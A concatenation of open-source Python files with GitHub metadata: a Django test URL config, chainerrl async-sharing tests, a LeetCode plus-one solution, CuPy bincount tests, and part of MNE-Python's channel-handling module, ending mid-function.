cancel_url = "/go_to_cancel_url/"
# Special urls for test cases.
urlpatterns += [
url(r'^default_cancel_url/', view=SetCancelUrlTestView.as_view(), name="default_cancel_url"),
url(r'^preset_cancel_url/', view=PresetSetCancelUrlTestView.as_view(), name="preset_cancel_url"),
url(r'^private/', view=BaseTemplateView.as_view(), name="private_zone_url"),
]
| {
"content_hash": "4d0db559e0bc6d08a78fd7426e1f2a95",
"timestamp": "",
"source": "github",
"line_count": 38,
"max_line_length": 101,
"avg_line_length": 36.44736842105263,
"alnum_prop": 0.7574007220216606,
"repo_name": "django-erp/django-erp",
"id": "1f59c8869b434ad26d83d9314c8ab83cb6dd7851",
"size": "1407",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "djangoerp/core/tests/urls.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "35186"
}
],
"symlink_target": ""
} |
from __future__ import print_function
from __future__ import unicode_literals
from __future__ import division
from __future__ import absolute_import
from builtins import * # NOQA
from future import standard_library
standard_library.install_aliases() # NOQA
import multiprocessing as mp
import os
import signal
import sys
import unittest
import warnings
import chainer
import chainer.links as L
from chainer import optimizers
import copy
import numpy as np
from chainerrl.misc import async_
class TestAsync(unittest.TestCase):
def setUp(self):
pass
def test_share_params(self):
# A's params are shared with B and C so that all the three share the
# same parameter arrays
model_a = L.Linear(2, 2)
arrays = async_.share_params_as_shared_arrays(model_a)
model_b = L.Linear(2, 2)
model_c = L.Linear(2, 2)
async_.set_shared_params(model_b, arrays)
async_.set_shared_params(model_c, arrays)
a_params = dict(model_a.namedparams())
b_params = dict(model_b.namedparams())
c_params = dict(model_c.namedparams())
def assert_same_pointers_to_data(a, b):
self.assertEqual(a['/W'].array.ctypes.data,
b['/W'].array.ctypes.data)
self.assertEqual(a['/b'].array.ctypes.data,
b['/b'].array.ctypes.data)
def assert_different_pointers_to_grad(a, b):
self.assertNotEqual(a['/W'].grad.ctypes.data,
b['/W'].grad.ctypes.data)
self.assertNotEqual(a['/b'].grad.ctypes.data,
b['/b'].grad.ctypes.data)
# Pointers to parameters must be the same
assert_same_pointers_to_data(a_params, b_params)
assert_same_pointers_to_data(a_params, c_params)
# Pointers to gradients must be different
assert_different_pointers_to_grad(a_params, b_params)
assert_different_pointers_to_grad(a_params, c_params)
def test_share_states(self):
model = L.Linear(2, 2)
opt_a = optimizers.RMSprop()
opt_a.setup(model)
arrays = async_.share_states_as_shared_arrays(opt_a)
opt_b = optimizers.RMSprop()
opt_b.setup(copy.deepcopy(model))
# In Chainer v2, a model cannot be set up by two optimizers or more.
opt_c = optimizers.RMSprop()
opt_c.setup(copy.deepcopy(model))
"""
Removed the tests by assert_different_pointers
since they are trivial now.
"""
async_.set_shared_states(opt_b, arrays)
async_.set_shared_states(opt_c, arrays)
def assert_same_pointers(a, b):
a = a.target
b = b.target
for param_name, param_a in a.namedparams():
param_b = dict(b.namedparams())[param_name]
state_a = param_a.update_rule.state
state_b = param_b.update_rule.state
self.assertTrue(state_a)
self.assertTrue(state_b)
for state_name, state_val_a in state_a.items():
state_val_b = state_b[state_name]
self.assertTrue(isinstance(
state_val_a, np.ndarray))
self.assertTrue(isinstance(
state_val_b, np.ndarray))
self.assertEqual(state_val_a.ctypes.data,
state_val_b.ctypes.data)
assert_same_pointers(opt_a, opt_b)
assert_same_pointers(opt_a, opt_c)
def test_shared_link(self):
"""Check interprocess parameter sharing works if models share links"""
head = L.Linear(2, 2)
model_a = chainer.ChainList(head.copy(), L.Linear(2, 3))
model_b = chainer.ChainList(head.copy(), L.Linear(2, 4))
a_arrays = async_.extract_params_as_shared_arrays(
chainer.ChainList(model_a))
b_arrays = async_.extract_params_as_shared_arrays(
chainer.ChainList(model_b))
print(('model_a shared_arrays', a_arrays))
print(('model_b shared_arrays', b_arrays))
head = L.Linear(2, 2)
model_a = chainer.ChainList(head.copy(), L.Linear(2, 3))
model_b = chainer.ChainList(head.copy(), L.Linear(2, 4))
async_.set_shared_params(model_a, a_arrays)
async_.set_shared_params(model_b, b_arrays)
print('model_a replaced')
a_params = dict(model_a.namedparams())
for param_name, param in list(a_params.items()):
print((param_name, param.array.ctypes.data))
print('model_b replaced')
b_params = dict(model_b.namedparams())
for param_name, param in list(b_params.items()):
print((param_name, param.array.ctypes.data))
# Pointers to head parameters must be the same
self.assertEqual(a_params['/0/W'].array.ctypes.data,
b_params['/0/W'].array.ctypes.data)
self.assertEqual(a_params['/0/b'].array.ctypes.data,
b_params['/0/b'].array.ctypes.data)
# Pointers to tail parameters must be different
self.assertNotEqual(a_params['/1/W'].array.ctypes.data,
b_params['/1/W'].array.ctypes.data)
self.assertNotEqual(a_params['/1/b'].array.ctypes.data,
b_params['/1/b'].array.ctypes.data)
def test_shared_link_copy(self):
head = L.Linear(2, 2)
model_a = chainer.ChainList(head.copy(), L.Linear(2, 3))
model_b = chainer.ChainList(head.copy(), L.Linear(2, 4))
a_params = dict(model_a.namedparams())
b_params = dict(model_b.namedparams())
self.assertEqual(a_params['/0/W'].array.ctypes.data,
b_params['/0/W'].array.ctypes.data)
self.assertEqual(a_params['/0/b'].array.ctypes.data,
b_params['/0/b'].array.ctypes.data)
import copy
model_a_copy = copy.deepcopy(model_a)
model_b_copy = copy.deepcopy(model_b)
a_copy_params = dict(model_a_copy.namedparams())
b_copy_params = dict(model_b_copy.namedparams())
# When A and B are separately deepcopied, head is no longer shared
self.assertNotEqual(a_copy_params['/0/W'].array.ctypes.data,
b_copy_params['/0/W'].array.ctypes.data)
self.assertNotEqual(a_copy_params['/0/b'].array.ctypes.data,
b_copy_params['/0/b'].array.ctypes.data)
model_total_copy = copy.deepcopy(chainer.ChainList(model_a, model_b))
model_a_copy = model_total_copy[0]
model_b_copy = model_total_copy[1]
a_copy_params = dict(model_a_copy.namedparams())
b_copy_params = dict(model_b_copy.namedparams())
# When ChainList(A, B) is deepcopied, head is still shared!
self.assertEqual(a_copy_params['/0/W'].array.ctypes.data,
b_copy_params['/0/W'].array.ctypes.data)
self.assertEqual(a_copy_params['/0/b'].array.ctypes.data,
b_copy_params['/0/b'].array.ctypes.data)
def test_run_async(self):
counter = mp.Value('l', 0)
def run_func(process_idx):
for _ in range(1000):
with counter.get_lock():
counter.value += 1
async_.run_async(4, run_func)
self.assertEqual(counter.value, 4000)
def test_run_async_exit_code(self):
def run_with_exit_code_0(process_idx):
sys.exit(0)
def run_with_exit_code_11(process_idx):
os.kill(os.getpid(), signal.SIGSEGV)
with warnings.catch_warnings(record=True) as ws:
async_.run_async(4, run_with_exit_code_0)
# There should be no AbnormalExitWarning
self.assertEqual(
sum(1 if issubclass(
w.category, async_.AbnormalExitWarning) else 0
for w in ws), 0)
with warnings.catch_warnings(record=True) as ws:
async_.run_async(4, run_with_exit_code_11)
# There should be 4 AbnormalExitWarning
self.assertEqual(
sum(1 if issubclass(
w.category, async_.AbnormalExitWarning) else 0
for w in ws), 4)
| {
"content_hash": "c6912350d358c33e5b98ee8471dff830",
"timestamp": "",
"source": "github",
"line_count": 218,
"max_line_length": 78,
"avg_line_length": 38.206422018348626,
"alnum_prop": 0.574618801776924,
"repo_name": "toslunar/chainerrl",
"id": "6e52de85d56329c9721dae5ec83cbf5b2e4f6369",
"size": "8329",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/misc_tests/test_async.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "837028"
},
{
"name": "Shell",
"bytes": "11208"
}
],
"symlink_target": ""
} |
from __future__ import print_function
# Time: O(n)
# Space: O(1)
# Given a non-negative integer represented as a non-empty array of digits, plus one to the integer.
# You may assume the integer do not contain any leading zero, except the number 0 itself.
# The digits are stored such that the most significant digit is at the head of the list.
# in-place solution
class Solution(object):
def plusOne(self, digits):
"""
:type digits: List[int]
:rtype: List[int]
"""
for i in reversed(xrange(len(digits))):
if digits[i] == 9:
digits[i] = 0
else:
digits[i] += 1
return digits
digits[0] = 1
digits.append(0)
return digits
# Time: O(n)
# Space: O(n)
class Solution2(object):
def plusOne(self, digits):
"""
:type digits: List[int]
:rtype: List[int]
"""
result = digits[::-1]
carry = 1
for i in xrange(len(result)):
result[i] += carry
carry, result[i] = divmod(result[i], 10)
if carry:
result.append(carry)
return result[::-1]
if __name__ == "__main__":
print(Solution().plusOne([9, 9, 9, 9]))
| {
"content_hash": "c7c68bb62fce9e9f881aaec25ad9c2f6",
"timestamp": "",
"source": "github",
"line_count": 46,
"max_line_length": 99,
"avg_line_length": 27.195652173913043,
"alnum_prop": 0.5419664268585132,
"repo_name": "tudennis/LeetCode---kamyu104-11-24-2015",
"id": "335dcaf534e68a39ec4d2bfe1c20fc017eb7b5f8",
"size": "1251",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "Python/plus-one.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C++",
"bytes": "980817"
},
{
"name": "Go",
"bytes": "1907"
},
{
"name": "Java",
"bytes": "8367"
},
{
"name": "Python",
"bytes": "1365305"
},
{
"name": "SQLPL",
"bytes": "822"
},
{
"name": "Shell",
"bytes": "3218"
}
],
"symlink_target": ""
} |
import unittest
import numpy
from cupy import testing
# Note that numpy.bincount does not support uint64 as it casts an input array
# to int64.
_except_uint64 = (
numpy.float16, numpy.float32, numpy.float64,
numpy.int8, numpy.int16, numpy.int32, numpy.int64,
numpy.uint8, numpy.uint16, numpy.uint32,
numpy.bool_)
def for_dtypes_except_uint64(name='dtype'):
return testing.for_dtypes(_except_uint64, name=name)
def for_dtypes_combination_except_uint64(names):
return testing.helper.for_dtypes_combination(_except_uint64, names=names)
@testing.gpu
class TestHistogram(unittest.TestCase):
_multiprocess_can_split_ = True
@for_dtypes_except_uint64()
@testing.numpy_cupy_allclose()
def test_bincount(self, xp, dtype):
x = testing.shaped_arange((3,), xp, dtype)
return xp.bincount(x)
@for_dtypes_except_uint64()
@testing.numpy_cupy_allclose()
def test_bincount_duplicated_value(self, xp, dtype):
x = xp.array([1, 2, 2, 1, 2, 4], dtype)
return xp.bincount(x)
@for_dtypes_combination_except_uint64(names=['x_type', 'w_type'])
@testing.numpy_cupy_allclose()
def test_bincount_with_weight(self, xp, x_type, w_type):
x = testing.shaped_arange((3,), xp, x_type)
w = testing.shaped_arange((3,), xp, w_type)
return xp.bincount(x, weights=w)
@for_dtypes_except_uint64()
@testing.numpy_cupy_allclose()
def test_bincount_with_minlength(self, xp, dtype):
x = testing.shaped_arange((3,), xp, dtype)
return xp.bincount(x, minlength=5)
@for_dtypes_combination_except_uint64(names=['x_type', 'w_type'])
@testing.numpy_cupy_raises()
def test_bincount_invalid_weight_length(self, xp, x_type, w_type):
x = testing.shaped_arange((1,), xp, x_type)
w = testing.shaped_arange((2,), xp, w_type)
return xp.bincount(x, weights=w)
@testing.for_signed_dtypes()
@testing.numpy_cupy_raises()
def test_bincount_negative(self, xp, dtype):
x = testing.shaped_arange((3,), xp, dtype) - 2
return xp.bincount(x)
@for_dtypes_except_uint64()
@testing.numpy_cupy_raises()
def test_bincount_too_deep(self, xp, dtype):
x = xp.array([[1]], dtype)
return xp.bincount(x)
@for_dtypes_except_uint64()
@testing.numpy_cupy_raises()
def test_bincount_too_small(self, xp, dtype):
x = xp.zeros((), dtype)
return xp.bincount(x)
@for_dtypes_except_uint64()
@testing.numpy_cupy_raises()
def test_bincount_zero_minlength(self, xp, dtype):
x = testing.shaped_arange((3,), xp, dtype)
return xp.bincount(x, minlength=0)
| {
"content_hash": "6e4235357a8416acbf82df7b323e31d8",
"timestamp": "",
"source": "github",
"line_count": 84,
"max_line_length": 77,
"avg_line_length": 31.80952380952381,
"alnum_prop": 0.6482035928143712,
"repo_name": "muupan/chainer",
"id": "920e3c82e31a049d94ab7f15856c8f1857ae1658",
"size": "2672",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "tests/cupy_tests/statics_tests/test_histogram.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "18613"
},
{
"name": "Cuda",
"bytes": "6118"
},
{
"name": "Python",
"bytes": "1222891"
}
],
"symlink_target": ""
} |
import os
import os.path as op
import warnings
import numpy as np
from scipy import sparse
from ..externals.six import string_types
from ..utils import verbose, logger
from ..io.pick import (channel_type, pick_info, pick_types,
_check_excludes_includes)
from ..io.constants import FIFF
def _get_meg_system(info):
"""Educated guess for the helmet type based on channels"""
system = '306m'
for ch in info['chs']:
if ch['kind'] == FIFF.FIFFV_MEG_CH:
coil_type = ch['coil_type'] & 0xFFFF
if coil_type == FIFF.FIFFV_COIL_NM_122:
system = '122m'
break
elif coil_type // 1000 == 3: # All Vectorview coils are 30xx
system = '306m'
break
elif (coil_type == FIFF.FIFFV_COIL_MAGNES_MAG or
coil_type == FIFF.FIFFV_COIL_MAGNES_GRAD):
nmag = np.sum([c['kind'] == FIFF.FIFFV_MEG_CH
for c in info['chs']])
system = 'Magnes_3600wh' if nmag > 150 else 'Magnes_2500wh'
break
elif coil_type == FIFF.FIFFV_COIL_CTF_GRAD:
system = 'CTF_275'
break
elif coil_type == FIFF.FIFFV_COIL_KIT_GRAD:
system = 'KIT'
break
elif coil_type == FIFF.FIFFV_COIL_BABY_GRAD:
system = 'BabySQUID'
break
return system
def _contains_ch_type(info, ch_type):
"""Check whether a certain channel type is in an info object
Parameters
---------
info : instance of mne.io.meas_info.Info
The measurement information.
ch_type : str
the channel type to be checked for
Returns
-------
has_ch_type : bool
Whether the channel type is present or not.
"""
if not isinstance(ch_type, string_types):
raise ValueError('`ch_type` is of class {actual_class}. It must be '
'`str`'.format(actual_class=type(ch_type)))
valid_channel_types = ['grad', 'mag', 'planar1', 'planar2', 'eeg', 'stim',
'eog', 'emg', 'ecg', 'ref_meg', 'resp', 'exci',
'ias', 'syst', 'seeg', 'misc']
if ch_type not in valid_channel_types:
raise ValueError('ch_type must be one of %s, not "%s"'
% (valid_channel_types, ch_type))
if info is None:
raise ValueError('Cannot check for channels of type "%s" because info '
'is None' % (ch_type,))
return ch_type in [channel_type(info, ii) for ii in range(info['nchan'])]
def _get_ch_type(inst, ch_type):
"""Helper to choose a single channel type (usually for plotting)
Usually used in plotting to plot a single datatype, e.g. look for mags,
then grads, then ... to plot.
"""
if ch_type is None:
for type_ in ['mag', 'grad', 'planar1', 'planar2', 'eeg']:
if type_ in inst:
ch_type = type_
break
else:
raise RuntimeError('No plottable channel types found')
return ch_type
@verbose
def equalize_channels(candidates, verbose=None):
"""Equalize channel picks for a collection of MNE-Python objects
Parameters
----------
candidates : list
list Raw | Epochs | Evoked.
verbose : None | bool
whether to be verbose or not.
Notes
-----
This function operates inplace.
"""
from ..io.base import _BaseRaw
from ..epochs import _BaseEpochs
from ..evoked import Evoked
from ..time_frequency import AverageTFR
if not all(isinstance(c, (_BaseRaw, _BaseEpochs, Evoked, AverageTFR))
for c in candidates):
valid = ['Raw', 'Epochs', 'Evoked', 'AverageTFR']
raise ValueError('candidates must be ' + ' or '.join(valid))
chan_max_idx = np.argmax([c.info['nchan'] for c in candidates])
chan_template = candidates[chan_max_idx].ch_names
logger.info('Identiying common channels ...')
channels = [set(c.ch_names) for c in candidates]
common_channels = set(chan_template).intersection(*channels)
dropped = list()
for c in candidates:
drop_them = list(set(c.ch_names) - common_channels)
if drop_them:
c.drop_channels(drop_them)
dropped.extend(drop_them)
if dropped:
dropped = list(set(dropped))
logger.info('Dropped the following channels:\n%s' % dropped)
else:
logger.info('all channels are corresponding, nothing to do.')
class ContainsMixin(object):
"""Mixin class for Raw, Evoked, Epochs
"""
def __contains__(self, ch_type):
"""Check channel type membership"""
if ch_type == 'meg':
has_ch_type = (_contains_ch_type(self.info, 'mag') or
_contains_ch_type(self.info, 'grad'))
else:
has_ch_type = _contains_ch_type(self.info, ch_type)
return has_ch_type
class SetChannelsMixin(object):
"""Mixin class for Raw, Evoked, Epochs
"""
def _get_channel_positions(self, picks=None):
"""Gets channel locations from info
Parameters
----------
picks : array-like of int | None
Indices of channels to include. If None (default), all meg and eeg
channels that are available are returned (bad channels excluded).
Notes
-----
.. versionadded:: 0.9.0
"""
if picks is None:
picks = pick_types(self.info, meg=True, eeg=True)
chs = self.info['chs']
pos = np.array([chs[k]['loc'][:3] for k in picks])
n_zero = np.sum(np.sum(np.abs(pos), axis=1) == 0)
if n_zero > 1: # XXX some systems have origin (0, 0, 0)
raise ValueError('Could not extract channel positions for '
'{} channels'.format(n_zero))
return pos
def _set_channel_positions(self, pos, names):
"""Update channel locations in info
Parameters
----------
pos : array-like | np.ndarray, shape (n_points, 3)
The channel positions to be set.
names : list of str
The names of the channels to be set.
Notes
-----
.. versionadded:: 0.9.0
"""
if len(pos) != len(names):
raise ValueError('Number of channel positions not equal to '
'the number of names given.')
pos = np.asarray(pos, dtype=np.float)
if pos.shape[-1] != 3 or pos.ndim != 2:
msg = ('Channel positions must have the shape (n_points, 3) '
'not %s.' % (pos.shape,))
raise ValueError(msg)
for name, p in zip(names, pos):
if name in self.ch_names:
idx = self.ch_names.index(name)
self.info['chs'][idx]['loc'][:3] = p
else:
msg = ('%s was not found in the info. Cannot be updated.'
% name)
raise ValueError(msg)
def set_channel_types(self, mapping):
"""Define the sensor type of channels.
Note: The following sensor types are accepted:
ecg, eeg, emg, eog, exci, ias, misc, resp, seeg, stim, syst
Parameters
----------
mapping : dict
a dictionary mapping a channel to a sensor type (str)
{'EEG061': 'eog'}.
Notes
-----
.. versionadded:: 0.9.0
"""
human2fiff = {'ecg': FIFF.FIFFV_ECG_CH,
'eeg': FIFF.FIFFV_EEG_CH,
'emg': FIFF.FIFFV_EMG_CH,
'eog': FIFF.FIFFV_EOG_CH,
'exci': FIFF.FIFFV_EXCI_CH,
'ias': FIFF.FIFFV_IAS_CH,
'misc': FIFF.FIFFV_MISC_CH,
'resp': FIFF.FIFFV_RESP_CH,
'seeg': FIFF.FIFFV_SEEG_CH,
'stim': FIFF.FIFFV_STIM_CH,
'syst': FIFF.FIFFV_SYST_CH}
human2unit = {'ecg': FIFF.FIFF_UNIT_V,
'eeg': FIFF.FIFF_UNIT_V,
'emg': FIFF.FIFF_UNIT_V,
'eog': FIFF.FIFF_UNIT_V,
'exci': FIFF.FIFF_UNIT_NONE,
'ias': FIFF.FIFF_UNIT_NONE,
'misc': FIFF.FIFF_UNIT_V,
'resp': FIFF.FIFF_UNIT_NONE,
'seeg': FIFF.FIFF_UNIT_V,
'stim': FIFF.FIFF_UNIT_NONE,
'syst': FIFF.FIFF_UNIT_NONE}
unit2human = {FIFF.FIFF_UNIT_V: 'V',
FIFF.FIFF_UNIT_NONE: 'NA'}
ch_names = self.info['ch_names']
# first check and assemble clean mappings of index and name
for ch_name, ch_type in mapping.items():
if ch_name not in ch_names:
raise ValueError("This channel name (%s) doesn't exist in "
"info." % ch_name)
c_ind = ch_names.index(ch_name)
if ch_type not in human2fiff:
raise ValueError('This function cannot change to this '
'channel type: %s. Accepted channel types '
'are %s.' % (ch_type,
", ".join(human2unit.keys())))
# Set sensor type
self.info['chs'][c_ind]['kind'] = human2fiff[ch_type]
unit_old = self.info['chs'][c_ind]['unit']
unit_new = human2unit[ch_type]
if unit_old != human2unit[ch_type]:
warnings.warn("The unit for Channel %s has changed "
"from %s to %s." % (ch_name,
unit2human[unit_old],
unit2human[unit_new]))
self.info['chs'][c_ind]['unit'] = human2unit[ch_type]
if ch_type in ['eeg', 'seeg']:
self.info['chs'][c_ind]['coil_type'] = FIFF.FIFFV_COIL_EEG
else:
self.info['chs'][c_ind]['coil_type'] = FIFF.FIFFV_COIL_NONE
def rename_channels(self, mapping):
"""Rename channels.
Parameters
----------
mapping : dict | callable
a dictionary mapping the old channel to a new channel name
e.g. {'EEG061' : 'EEG161'}. Can also be a callable function
that takes and returns a string (new in version 0.10.0).
Notes
-----
.. versionadded:: 0.9.0
"""
rename_channels(self.info, mapping)
def set_montage(self, montage):
"""Set EEG sensor configuration
Parameters
----------
montage : instance of Montage or DigMontage
Notes
-----
Operates in place.
.. versionadded:: 0.9.0
"""
from .montage import _set_montage
_set_montage(self.info, montage)
class UpdateChannelsMixin(object):
"""Mixin class for Raw, Evoked, Epochs, AverageTFR
"""
def pick_types(self, meg=True, eeg=False, stim=False, eog=False,
ecg=False, emg=False, ref_meg='auto', misc=False,
resp=False, chpi=False, exci=False, ias=False, syst=False,
seeg=False, include=[], exclude='bads', selection=None,
copy=False):
"""Pick some channels by type and names
Parameters
----------
meg : bool | str
If True include all MEG channels. If False include None
If string it can be 'mag', 'grad', 'planar1' or 'planar2' to select
only magnetometers, all gradiometers, or a specific type of
gradiometer.
eeg : bool
If True include EEG channels.
stim : bool
If True include stimulus channels.
eog : bool
If True include EOG channels.
ecg : bool
If True include ECG channels.
emg : bool
If True include EMG channels.
ref_meg: bool | str
If True include CTF / 4D reference channels. If 'auto', the
reference channels are only included if compensations are present.
misc : bool
If True include miscellaneous analog channels.
resp : bool
If True include response-trigger channel. For some MEG systems this
is separate from the stim channel.
chpi : bool
If True include continuous HPI coil channels.
exci : bool
Flux excitation channel used to be a stimulus channel.
ias : bool
Internal Active Shielding data (maybe on Triux only).
syst : bool
System status channel information (on Triux systems only).
seeg : bool
Stereotactic EEG channels.
include : list of string
List of additional channels to include. If empty do not include
any.
exclude : list of string | str
List of channels to exclude. If 'bads' (default), exclude channels
in ``info['bads']``.
selection : list of string
Restrict sensor channels (MEG, EEG) to this list of channel names.
copy : bool
If True, returns new instance. Else, modifies in place. Defaults to
False.
Notes
-----
.. versionadded:: 0.9.0
"""
inst = self.copy() if copy else self
idx = pick_types(
self.info, meg=meg, eeg=eeg, stim=stim, eog=eog, ecg=ecg, emg=emg,
ref_meg=ref_meg, misc=misc, resp=resp, chpi=chpi, exci=exci,
ias=ias, syst=syst, seeg=seeg, include=include, exclude=exclude,
selection=selection)
inst._pick_drop_channels(idx)
return inst
def pick_channels(self, ch_names, copy=False):
"""Pick some channels
Parameters
----------
ch_names : list
The list of channels to select.
copy : bool
If True, returns new instance. Else, modifies in place. Defaults to
False.
See Also
--------
drop_channels
Notes
-----
.. versionadded:: 0.9.0
"""
inst = self.copy() if copy else self
_check_excludes_includes(ch_names)
idx = [inst.ch_names.index(c) for c in ch_names if c in inst.ch_names]
inst._pick_drop_channels(idx)
return inst
def drop_channels(self, ch_names, copy=False):
"""Drop some channels
Parameters
----------
ch_names : list
The list of channels to remove.
copy : bool
If True, returns new instance. Else, modifies in place. Defaults to
False.
See Also
--------
pick_channels
Notes
-----
.. versionadded:: 0.9.0
"""
inst = self.copy() if copy else self
bad_idx = [inst.ch_names.index(c) for c in ch_names
if c in inst.ch_names]
idx = np.setdiff1d(np.arange(len(inst.ch_names)), bad_idx)
inst._pick_drop_channels(idx)
return inst
def _pick_drop_channels(self, idx):
# avoid circular imports
from ..io.base import _BaseRaw
from ..epochs import _BaseEpochs
from ..evoked import Evoked
from ..time_frequency import AverageTFR
if isinstance(self, (_BaseRaw, _BaseEpochs)):
if not self.preload:
raise RuntimeError('If Raw or Epochs, data must be preloaded '
'to drop or pick channels')
def inst_has(attr):
return getattr(self, attr, None) is not None
if inst_has('picks'):
self.picks = self.picks[idx]
if inst_has('_cals'):
self._cals = self._cals[idx]
self.info = pick_info(self.info, idx, copy=False)
if inst_has('_projector'):
self._projector = self._projector[idx][:, idx]
if isinstance(self, _BaseRaw) and inst_has('_data'):
self._data = self._data.take(idx, axis=0)
elif isinstance(self, _BaseEpochs) and inst_has('_data'):
self._data = self._data.take(idx, axis=1)
elif isinstance(self, AverageTFR) and inst_has('data'):
self.data = self.data.take(idx, axis=0)
elif isinstance(self, Evoked):
self.data = self.data.take(idx, axis=0)
def add_channels(self, add_list, copy=False):
"""Append new channels to the instance.
Parameters
----------
add_list : list
A list of objects to append to self. Must contain all the same
type as the current object
copy : bool
Whether to return a new instance or modify in place
Returns
-------
out : MNE object of type(self)
An object with new channels appended (will be the same
object if copy==False)
"""
# avoid circular imports
from ..io.base import _BaseRaw
from ..epochs import _BaseEpochs
from ..io.meas_info import _merge_info
if not isinstance(add_list, (list, tuple)):
raise AssertionError('Input must be a list or tuple of objs')
# Object-specific checks
if isinstance(self, (_BaseRaw, _BaseEpochs)):
if not all([inst.preload for inst in add_list] + [self.preload]):
raise AssertionError('All data must be preloaded')
data_name = '_data'
if isinstance(self, _BaseRaw):
con_axis = 0
comp_class = _BaseRaw
elif isinstance(self, _BaseEpochs):
con_axis = 1
comp_class = _BaseEpochs
else:
data_name = 'data'
con_axis = 0
comp_class = type(self)
if not all(isinstance(inst, comp_class) for inst in add_list):
raise AssertionError('All input data must be of same type')
data = [getattr(self, data_name)] + [getattr(inst, data_name)
for inst in add_list]
# Make sure that all dimensions other than channel axis are the same
compare_axes = [i for i in range(data[0].ndim) if i != con_axis]
shapes = np.array([dat.shape for dat in data])[:, compare_axes]
if not ((shapes[0] - shapes) == 0).all():
raise AssertionError('All dimensions except channels must match')
# Create final data / info objects
data = np.concatenate(data, axis=con_axis)
infos = [self.info] + [inst.info for inst in add_list]
new_info = _merge_info(infos)
# Now update the attributes
if copy is True:
out = self.copy()
else:
out = self
setattr(out, data_name, data)
out.info = new_info
return out
class InterpolationMixin(object):
"""Mixin class for Raw, Evoked, Epochs
"""
def interpolate_bads(self, reset_bads=True, mode='accurate'):
"""Interpolate bad MEG and EEG channels.
Operates in place.
Parameters
----------
reset_bads : bool
If True, remove the bads from info.
mode : str
Either `'accurate'` or `'fast'`, determines the quality of the
Legendre polynomial expansion used for interpolation of MEG
channels.
Returns
-------
self : mne.io.Raw, mne.Epochs or mne.Evoked
The interpolated data.
Notes
-----
.. versionadded:: 0.9.0
"""
from .interpolation import _interpolate_bads_eeg, _interpolate_bads_meg
if getattr(self, 'preload', None) is False:
raise ValueError('Data must be preloaded.')
_interpolate_bads_eeg(self)
_interpolate_bads_meg(self, mode=mode)
if reset_bads is True:
self.info['bads'] = []
return self
def rename_channels(info, mapping):
"""Rename channels.
Parameters
----------
info : dict
Measurement info.
mapping : dict | callable
a dictionary mapping the old channel to a new channel name
e.g. {'EEG061' : 'EEG161'}. Can also be a callable function
that takes and returns a string (new in version 0.10.0).
"""
info._check_consistency()
bads = list(info['bads']) # make our own local copies
ch_names = list(info['ch_names'])
# first check and assemble clean mappings of index and name
if isinstance(mapping, dict):
orig_names = sorted(list(mapping.keys()))
missing = [orig_name not in ch_names for orig_name in orig_names]
if any(missing):
raise ValueError("Channel name(s) in mapping missing from info: "
"%s" % np.array(orig_names)[np.array(missing)])
new_names = [(ch_names.index(ch_name), new_name)
for ch_name, new_name in mapping.items()]
elif callable(mapping):
new_names = [(ci, mapping(ch_name))
for ci, ch_name in enumerate(ch_names)]
else:
raise ValueError('mapping must be callable or dict, not %s'
% (type(mapping),))
# check we got all strings out of the mapping
if any(not isinstance(new_name[1], string_types)
for new_name in new_names):
raise ValueError('New channel mapping must only be to strings')
# do the remapping locally
for c_ind, new_name in new_names:
for bi, bad in enumerate(bads):
if bad == ch_names[c_ind]:
bads[bi] = new_name
ch_names[c_ind] = new_name
# check that all the channel names are unique
if len(ch_names) != len(np.unique(ch_names)):
raise ValueError('New channel names are not unique, renaming failed')
# do the reampping in info
info['bads'] = bads
info['ch_names'] = ch_names
for ch, ch_name in zip(info['chs'], ch_names):
ch['ch_name'] = ch_name
info._check_consistency()
def _recursive_flatten(cell, dtype):
"""Helper to unpack mat files in Python"""
while not isinstance(cell[0], dtype):
cell = [c for d in cell for c in d]
return cell
def read_ch_connectivity(fname, picks=None):
"""Parse FieldTrip neighbors .mat file
More information on these neighbor definitions can be found on the
related FieldTrip documentation pages:
http://fieldtrip.fcdonders.nl/template/neighbours
Parameters
----------
fname : str
The file name. Example: 'neuromag306mag', 'neuromag306planar',
'ctf275', 'biosemi64', etc.
picks : array-like of int, shape (n_channels,)
The indices of the channels to include. Must match the template.
Defaults to None.
Returns
-------
ch_connectivity : scipy.sparse matrix
The connectivity matrix.
ch_names : list
The list of channel names present in connectivity matrix.
"""
from scipy.io import loadmat
if not op.isabs(fname):
templates_dir = op.realpath(op.join(op.dirname(__file__),
'data', 'neighbors'))
templates = os.listdir(templates_dir)
for f in templates:
if f == fname:
break
if f == fname + '_neighb.mat':
fname += '_neighb.mat'
break
else:
raise ValueError('I do not know about this neighbor '
'template: "{}"'.format(fname))
fname = op.join(templates_dir, fname)
nb = loadmat(fname)['neighbours']
ch_names = _recursive_flatten(nb['label'], string_types)
neighbors = [_recursive_flatten(c, string_types) for c in
nb['neighblabel'].flatten()]
assert len(ch_names) == len(neighbors)
if picks is not None:
if max(picks) >= len(ch_names):
raise ValueError('The picks must be compatible with '
'channels. Found a pick ({}) which exceeds '
'the channel range ({})'
.format(max(picks), len(ch_names)))
connectivity = _ch_neighbor_connectivity(ch_names, neighbors)
if picks is not None:
# picking before constructing matrix is buggy
connectivity = connectivity[picks][:, picks]
ch_names = [ch_names[p] for p in picks]
return connectivity, ch_names
def _ch_neighbor_connectivity(ch_names, neighbors):
"""Compute sensor connectivity matrix
Parameters
----------
ch_names : list of str
The channel names.
neighbors : list of list
A list of list of channel names. The neighbors to
which the channels in ch_names are connected with.
Must be of the same length as ch_names.
Returns
-------
ch_connectivity : scipy.sparse matrix
The connectivity matrix.
"""
if len(ch_names) != len(neighbors):
raise ValueError('`ch_names` and `neighbors` must '
'have the same length')
set_neighbors = set([c for d in neighbors for c in d])
rest = set(ch_names) - set_neighbors
if len(rest) > 0:
raise ValueError('Some of your neighbors are not present in the '
'list of channel names')
for neigh in neighbors:
if (not isinstance(neigh, list) and
not all(isinstance(c, string_types) for c in neigh)):
raise ValueError('`neighbors` must be a list of lists of str')
ch_connectivity = np.eye(len(ch_names), dtype=bool)
for ii, neigbs in enumerate(neighbors):
